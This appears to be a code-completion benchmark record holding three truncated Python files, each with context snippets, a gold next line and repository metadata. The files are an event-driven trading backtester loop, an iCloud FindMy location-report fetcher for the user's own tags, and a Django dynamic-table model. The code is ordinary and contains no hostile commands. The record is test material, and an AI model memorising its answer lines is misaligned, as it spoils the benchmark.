"snippet": "class SignalEvent(Event):\n \"\"\"\n Signal event generated from a particular strategy, if signal met strategy\n conditions\n\n Parameters:\n symbol - The symbol for current asset.\n datetime - A datetime at which the signal is generated.\n signal_type - The signal type ('LONG', 'SHORT', 'EXIT')\n strength - strength of the signal --> TODO: this should be given from a\n risk class when applying multiple strats\n \"\"\"\n\n def __init__(self, symbol, datetime, signal_type, strength):\n self.type = \"SIGNAL\"\n self.symbol = symbol\n self.datetime = datetime\n self.signal_type = signal_type\n self.strength = strength"
},
{
"identifier": "OrderEvent",
"path": "backtester/events.py",
"snippet": "class OrderEvent(Event):\n \"\"\"\n Order event to be sent to a broker api. It takes into account the quantity,\n type of ordering, and direction (long, short, exit...)\n\n Parameters:\n symbol - The symbol for current asset.\n order_type - Whether is it a 'MARKET' or 'LIMIT' order\n quantity --> TODO: this should be implemented in a risk class\n (Kelly Criterion, etc)\n direction - 1 or -1 based on the type\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n self.type = \"ORDER\"\n self.symbol = symbol\n self.order_type = order_type\n self.quantity = quantity\n self.direction = direction\n\n def print_order(self):\n \"\"\"\n Outputs the values within the Order.\n \"\"\"\n print(\"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\") % (\n self.symbol,\n self.order_type,\n self.quantity,\n self.direction,\n )"
},
{
"identifier": "FillEvent",
"path": "backtester/events.py",
"snippet": "class FillEvent(Event):\n \"\"\"\n Fill event once an order based on the response from the broker\n\n Parameters:\n datetime - A datetime at which the signal is created.\n symbol - The symbol for current asset.\n exchange - The exchange, broker where the order is filled\n quantity - quantity filled\n direction\n fill_cost - can contain commission already\n commission - Defaulted to None if non specified\n \"\"\"\n\n def __init__(\n self,\n datetime,\n symbol,\n exchange,\n quantity,\n direction,\n fill_cost,\n commission=None,\n ):\n self.type = \"FILL\"\n self.datetime = datetime\n self.symbol = symbol\n self.exchange = exchange\n self.quantity = quantity\n self.direction = direction\n self.fill_cost = fill_cost\n\n # Calculate commission\n if commission is None:\n self.commission = self._calculate_commission()\n else:\n self.commission = commission\n\n def _calculate_commission(self):\n \"\"\"\n TODO: Commission fees to be implemented\n \"\"\"\n # between 1 and 2%\n return max(1.5, 0.015 * self.quantity)"
},
{
"identifier": "CSVGenerator",
"path": "backtester/generator/csvgenerator.py",
"snippet": "class CSVGenerator(Generator):\n def __init__(self, symbol_list):\n self.csv_dir = Path.cwd() / \"data\"\n self.symbol_list = symbol_list\n\n self.symbol_data = {}\n self.latest_symbol_data = {}\n self.continue_backtest = True\n self._load()\n\n def register(self, events):\n self.events = events\n\n def _load(self):\n combined_index = None\n for symbol in self.symbol_list:\n self.symbol_data[symbol] = pd.io.parsers.read_csv(\n os.path.join(self.csv_dir, \"%s.csv\" % symbol),\n header=0,\n index_col=0,\n names=[\n \"datetime\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"adj_close\",\n \"volume\",\n ],\n )\n\n # Combine the index to pad forward values\n if combined_index is None:\n combined_index = self.symbol_data[symbol].index\n else:\n combined_index.union(self.symbol_data[symbol].index)\n\n # Set the latest symbol_data to None\n self.latest_symbol_data[symbol] = []\n\n # Reindex the dataframes\n for symbol in self.symbol_list:\n self.symbol_data[symbol] = (\n self.symbol_data[symbol]\n .reindex(index=combined_index, method=\"pad\")\n .iterrows()\n )\n\n def _get_new_bar(self, symbol):\n for bar in self.symbol_data[symbol]:\n yield bar\n\n def get_latest_bar(self, symbol):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-1]\n\n def get_latest_bars(self, symbol, N=1):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-N:]\n\n def get_latest_bar_datetime(self, symbol):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-1][0]\n\n def get_latest_bar_value(self, symbol, value_type):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return getattr(bars_list[-1][1], value_type)\n\n def get_latest_bars_values(self, symbol, value_type, N=1):\n try:\n bars_list = self.get_latest_bars(symbol, N)\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return np.array([getattr(bar[1], value_type) for bar in bars_list])\n\n def update_bars(self):\n for symbol in self.symbol_list:\n try:\n bar = next(self._get_new_bar(symbol))\n except StopIteration:\n self.continue_backtest = False\n else:\n if bar is not None:\n self.latest_symbol_data[symbol].append(bar)\n self.events.put(MarketEvent())"
}
] | import pprint
import queue
import time
from .events import MarketEvent, SignalEvent, OrderEvent, FillEvent
from .generator import CSVGenerator | 1,965 |
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None:
|
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None: | if isinstance(event, MarketEvent): | 0 | 2023-12-16 21:09:00+00:00 | 4k |
liebrandapps/FindMyGUI | findmy/request_reports.py | [
{
"identifier": "icloud_login_mobileme",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def icloud_login_mobileme(ctx, second_factor='sms'):\n username = ctx.cfg.appleId_appleId\n password = ctx.cfg.appleId_password\n anisetteUrl = ctx.cfg.general_anisetteHost + \":\" + str(ctx.cfg.general_anisettePort)\n if not username or not password:\n now = datetime.now()\n ctx.signInDone = False\n ctx.requestCreds = int(now.timestamp())\n ctx.log.info(\"[ICLOUD] Waiting for password (90 seconds from now on)\")\n interval = 30\n while interval > 0:\n time.sleep(3.0)\n if len(ctx.userName) > 0 and len(ctx.password) > 0:\n username = ctx.userName\n password = ctx.password\n interval = 0\n continue\n if not username or not password:\n ctx.log.error(\"[ICLOUD] No User/Password received, stopping\")\n return None\n else:\n ctx.log.info(f\"[ICLOUD] Received User {username} / Password\")\n\n g = gsa_authenticate(username, password, ctx, second_factor=second_factor)\n pet = g[\"t\"][\"com.apple.gs.idms.pet\"][\"token\"]\n adsid = g[\"adsid\"]\n\n data = {\n \"apple-id\": username,\n \"delegates\": {\"com.apple.mobileme\": {}},\n \"password\": pet,\n \"client-id\": str(USER_ID),\n }\n data = plist.dumps(data)\n\n headers = {\n \"X-Apple-ADSID\": adsid,\n \"User-Agent\": \"com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0\",\n \"X-Mme-Client-Info\": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>'\n }\n headers.update(generate_anisette_headers(anisetteUrl))\n\n r = requests.post(\n \"https://setup.icloud.com/setup/iosbuddy/loginDelegates\",\n auth=(username, pet),\n data=data,\n headers=headers,\n verify=False,\n )\n\n return plist.loads(r.content)"
},
{
"identifier": "generate_anisette_headers",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def generate_anisette_headers(anisetteUrl):\n try:\n import pyprovision\n from ctypes import c_ulonglong\n import secrets\n adi = pyprovision.ADI(\"./anisette/\")\n adi.provisioning_path = \"./anisette/\"\n device = pyprovision.Device(\"./anisette/device.json\")\n if not device.initialized:\n # Pretend to be a MacBook Pro\n device.server_friendly_description = \"<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>\"\n device.unique_device_identifier = str(uuid.uuid4()).upper()\n device.adi_identifier = secrets.token_hex(8).lower()\n device.local_user_uuid = secrets.token_hex(32).upper()\n adi.identifier = device.adi_identifier\n dsid = c_ulonglong(-2).value\n is_prov = adi.is_machine_provisioned(dsid)\n if not is_prov:\n print(\"provisioning...\")\n provisioning_session = pyprovision.ProvisioningSession(adi, device)\n provisioning_session.provision(dsid)\n otp = adi.request_otp(dsid)\n a = {\"X-Apple-I-MD\": base64.b64encode(bytes(otp.one_time_password)).decode(),\n \"X-Apple-I-MD-M\": base64.b64encode(bytes(otp.machine_identifier)).decode()}\n except ImportError:\n print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server')\n h = json.loads(requests.get(anisetteUrl, timeout=5).text)\n a = {\"X-Apple-I-MD\": h[\"X-Apple-I-MD\"], \"X-Apple-I-MD-M\": h[\"X-Apple-I-MD-M\"]}\n a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID))\n return a"
}
] | import base64
import datetime
import hashlib
import json
import os
import struct
import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers | 1,703 |
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth,
|
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth, | headers=generate_anisette_headers(self.ctx.cfg.general_anisetteHost+":"+str(self.ctx.cfg.general_anisettePort)), | 1 | 2023-12-16 12:39:52+00:00 | 4k |
aliosmankaya/shakespeare-gpt | inference.py | [
{
"identifier": "decode",
"path": "data.py",
"snippet": "def get_batch(split):"
},
{
"identifier": "GPT",
"path": "network.py",
"snippet": "class GPT(nn.Module):\n def __init__(self, config):\n super().__init__()\n assert config.vocab_size is not None\n assert config.block_size is not None\n self.config = config\n\n self.transformer = nn.ModuleDict(\n dict(\n wte=nn.Embedding(config.vocab_size, config.n_embd),\n wpe=nn.Embedding(config.block_size, config.n_embd),\n drop=nn.Dropout(config.dropout),\n h=nn.ModuleList([Block(config) for _ in range(config.n_layer)]),\n ln_f=LayerNorm(config.n_embd, bias=config.bias),\n )\n )\n self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)\n # with weight tying when using torch.compile() some warnings get generated:\n # \"UserWarning: functional_call was passed multiple values for tied weights.\n # This behavior is deprecated and will be an error in future versions\"\n # not 100% sure what this is, so far seems to be harmless. TODO investigate\n self.transformer.wte.weight = (\n self.lm_head.weight\n ) # https://paperswithcode.com/method/weight-tying\n\n # init all weights\n self.apply(self._init_weights)\n # apply special scaled init to the residual projections, per GPT-2 paper\n for pn, p in self.named_parameters():\n if pn.endswith(\"c_proj.weight\"):\n torch.nn.init.normal_(\n p, mean=0.0, std=0.02 / math.sqrt(2 * config.n_layer)\n )\n\n # report number of parameters\n print(\"number of parameters: %.2fM\" % (self.get_num_params() / 1e6,))\n\n def get_num_params(self, non_embedding=True):\n \"\"\"\n Return the number of parameters in the model.\n For non-embedding count (default), the position embeddings get subtracted.\n The token embeddings would too, except due to the parameter sharing these\n params are actually used as weights in the final layer, so we include them.\n \"\"\"\n n_params = sum(p.numel() for p in self.parameters())\n if non_embedding:\n n_params -= self.transformer.wpe.weight.numel()\n return n_params\n\n def _init_weights(self, module):\n if isinstance(module, nn.Linear):\n torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)\n if module.bias is not None:\n torch.nn.init.zeros_(module.bias)\n elif isinstance(module, nn.Embedding):\n torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)\n\n def forward(self, idx, targets=None):\n device = idx.device\n b, t = idx.size()\n assert (\n t <= self.config.block_size\n ), f\"Cannot forward sequence of length {t}, block size is only {self.config.block_size}\"\n pos = torch.arange(0, t, dtype=torch.long, device=device) # shape (t)\n\n # forward the GPT model itself\n tok_emb = self.transformer.wte(idx) # token embeddings of shape (b, t, n_embd)\n pos_emb = self.transformer.wpe(pos) # position embeddings of shape (t, n_embd)\n x = self.transformer.drop(tok_emb + pos_emb)\n for block in self.transformer.h:\n x = block(x)\n x = self.transformer.ln_f(x)\n\n if targets is not None:\n # if we are given some desired targets also calculate the loss\n logits = self.lm_head(x)\n loss = F.cross_entropy(\n logits.view(-1, logits.size(-1)), targets.view(-1), ignore_index=-1\n )\n else:\n # inference-time mini-optimization: only forward the lm_head on the very last position\n logits = self.lm_head(\n x[:, [-1], :]\n ) # note: using list [-1] to preserve the time dim\n loss = None\n\n return logits, loss\n\n def crop_block_size(self, block_size):\n # model surgery to decrease the block size if necessary\n # e.g. 
we may load the GPT2 pretrained model checkpoint (block size 1024)\n # but want to use a smaller block size for some smaller, simpler model\n assert block_size <= self.config.block_size\n self.config.block_size = block_size\n self.transformer.wpe.weight = nn.Parameter(\n self.transformer.wpe.weight[:block_size]\n )\n for block in self.transformer.h:\n if hasattr(block.attn, \"bias\"):\n block.attn.bias = block.attn.bias[:, :, :block_size, :block_size]\n\n def configure_optimizers(self, weight_decay, learning_rate, betas, device):\n # start with all of the candidate parameters\n param_dict = {pn: p for pn, p in self.named_parameters()}\n # filter out those that do not require grad\n param_dict = {pn: p for pn, p in param_dict.items() if p.requires_grad}\n # create optim groups. Any parameters that is 2D will be weight decayed, otherwise no.\n # i.e. all weight tensors in matmuls + embeddings decay, all biases and layernorms don't.\n decay_params = [p for n, p in param_dict.items() if p.dim() >= 2]\n nodecay_params = [p for n, p in param_dict.items() if p.dim() < 2]\n optim_groups = [\n {\"params\": decay_params, \"weight_decay\": weight_decay},\n {\"params\": nodecay_params, \"weight_decay\": 0.0},\n ]\n num_decay_params = sum(p.numel() for p in decay_params)\n num_nodecay_params = sum(p.numel() for p in nodecay_params)\n print(\n f\"num decayed parameter tensors: {len(decay_params)}, with {num_decay_params:,} parameters\"\n )\n print(\n f\"num non-decayed parameter tensors: {len(nodecay_params)}, with {num_nodecay_params:,} parameters\"\n )\n # Create AdamW optimizer and use the fused version if it is available\n fused_available = \"fused\" in inspect.signature(torch.optim.AdamW).parameters\n use_fused = fused_available and device == \"cuda\"\n extra_args = dict(fused=True) if use_fused else dict()\n optimizer = torch.optim.AdamW(\n optim_groups, lr=learning_rate, betas=betas, **extra_args\n )\n print(f\"using fused AdamW: {use_fused}\")\n\n return optimizer\n\n def estimate_mfu(self, fwdbwd_per_iter, dt):\n \"\"\"estimate model flops utilization (MFU) in units of A100 bfloat16 peak FLOPS\"\"\"\n # first estimate the number of flops we do per iteration.\n # see PaLM paper Appendix B as ref: https://arxiv.org/abs/2204.02311\n N = self.get_num_params()\n cfg = self.config\n L, H, Q, T = cfg.n_layer, cfg.n_head, cfg.n_embd // cfg.n_head, cfg.block_size\n flops_per_token = 6 * N + 12 * L * H * Q * T\n flops_per_fwdbwd = flops_per_token * T\n flops_per_iter = flops_per_fwdbwd * fwdbwd_per_iter\n # express our flops throughput as ratio of A100 bfloat16 peak flops\n flops_achieved = flops_per_iter * (1.0 / dt) # per second\n flops_promised = 312e12 # A100 GPU bfloat16 peak flops is 312 TFLOPS\n mfu = flops_achieved / flops_promised\n return mfu\n\n @torch.no_grad()\n def generate(self, idx, max_new_tokens, temperature=1.0, top_k=None):\n \"\"\"\n Take a conditioning sequence of indices idx (LongTensor of shape (b,t)) and complete\n the sequence max_new_tokens times, feeding the predictions back into the model each time.\n Most likely you'll want to make sure to be in model.eval() mode of operation for this.\n \"\"\"\n for _ in range(max_new_tokens):\n # if the sequence context is growing too long we must crop it at block_size\n idx_cond = (\n idx\n if idx.size(1) <= self.config.block_size\n else idx[:, -self.config.block_size :]\n )\n # forward the model to get the logits for the index in the sequence\n logits, _ = self(idx_cond)\n # pluck the logits at the final step and scale by desired 
temperature\n logits = logits[:, -1, :] / temperature\n # optionally crop the logits to only the top k options\n if top_k is not None:\n v, _ = torch.topk(logits, min(top_k, logits.size(-1)))\n logits[logits < v[:, [-1]]] = -float(\"Inf\")\n # apply softmax to convert logits to (normalized) probabilities\n probs = F.softmax(logits, dim=-1)\n # sample from the distribution\n idx_next = torch.multinomial(probs, num_samples=1)\n # append sampled index to the running sequence and continue\n idx = torch.cat((idx, idx_next), dim=1)\n\n return idx"
},
{
"identifier": "GPTConfig",
"path": "network.py",
"snippet": "class GPTConfig:\n block_size: int = 1024\n vocab_size: int = 50304 # GPT-2 vocab_size of 50257, padded up to nearest multiple of 64 for efficiency\n n_layer: int = 12\n n_head: int = 12\n n_embd: int = 768\n dropout: float = 0.0\n bias: bool = True # True: bias in Linears and LayerNorms, like GPT-2. False: a bit better and faster"
}
] | import torch
from data import decode, vocab_size
from network import GPT, GPTConfig
from parameters import * | 2,469 |
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
|
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
| gptconf = GPTConfig(**model_args) | 2 | 2023-12-17 17:54:31+00:00 | 4k |
Samuel-Effiong/Django-Dynamic-Table | django_dynamic_table/models.py | [
{
"identifier": "TableHaveNoRow",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoRow(DynamicTableError):\r\n pass\r"
},
{
"identifier": "TableHaveNoColumn",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoColumn(DynamicTableError):\r\n pass\r"
},
{
"identifier": "ColumnNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class ColumnNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "RowNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class RowNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DuplicateColumnInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class DuplicateColumnInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DynamicTableError",
"path": "django_dynamic_table/errors.py",
"snippet": "class DynamicTableError(Exception):\r\n pass\r"
},
{
"identifier": "UnSupportedDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class UnSupportedDataType(TableColumnError):\r\n pass\r"
},
{
"identifier": "CantParseValueToDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class CantParseValueToDataType(CellValueError):\r\n pass\r"
},
{
"identifier": "CellDoesNotExist",
"path": "django_dynamic_table/errors.py",
"snippet": "class CellDoesNotExist(CellValueError):\r\n pass"
}
] | from typing import Sequence
from datetime import datetime
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from .errors import (
TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable,
RowNotInTable, DuplicateColumnInTable, DynamicTableError,
UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist
)
| 2,436 | if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
raise DuplicateColumnInTable()
table_column = TableColumn(
table=self,
column_name=column_name,
column_data_type=data_type
)
table_column.save()
self.table_columns.add(table_column)
return table_column
else:
raise DynamicTableError("argument must be str, use self.bulk_add_columns to add multiple columns")
def bulk_add_columns(self, column_names: Sequence[str], data_types: Sequence[str]):
allowed_argument_type = (list, tuple, set)
if isinstance(column_names, allowed_argument_type) and isinstance(data_types, allowed_argument_type):
if len(column_names) != len(data_types):
raise DynamicTableError(f"len({column_names}) = {len(column_names)} != len({data_types}) = {len(data_types)}")
else:
# check if list of data_types contains any unsupported data type
supported_data_type = self.data_type_is_supported(data_types)
if False in supported_data_type:
raise UnSupportedDataType(f"{data_types} data type that are supported are: {supported_data_type}")
else:
# check if the provided column names contain duplicates, raise an error if it does
unique_column_names = set(column_names)
if len(column_names) != len(unique_column_names):
raise DuplicateColumnInTable()
is_column = [self.is_column(column) for column in column_names]
if True in is_column:
raise DuplicateColumnInTable()
columns = [
TableColumn.objects.create(
table=self,
column_name=column_name,
column_data_type=data_type
)
for column_name, data_type in zip(column_names, data_types, strict=True)
# the above further exception should not be activated, but adding it there,
# if just in case, for some unknown reason it escape the other safeguard.
]
self.table_columns.add(*columns)
return columns
else:
raise DynamicTableError("argument must be a sequence. use self.add_column to add a single column")
def add_row(self, value: dict):
if not isinstance(value, dict):
raise ValueError(f"{value} is not a list or a dict")
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
row = []
table_row = TableRow.objects.create(table=self)
for table_column in self.table_columns.all():
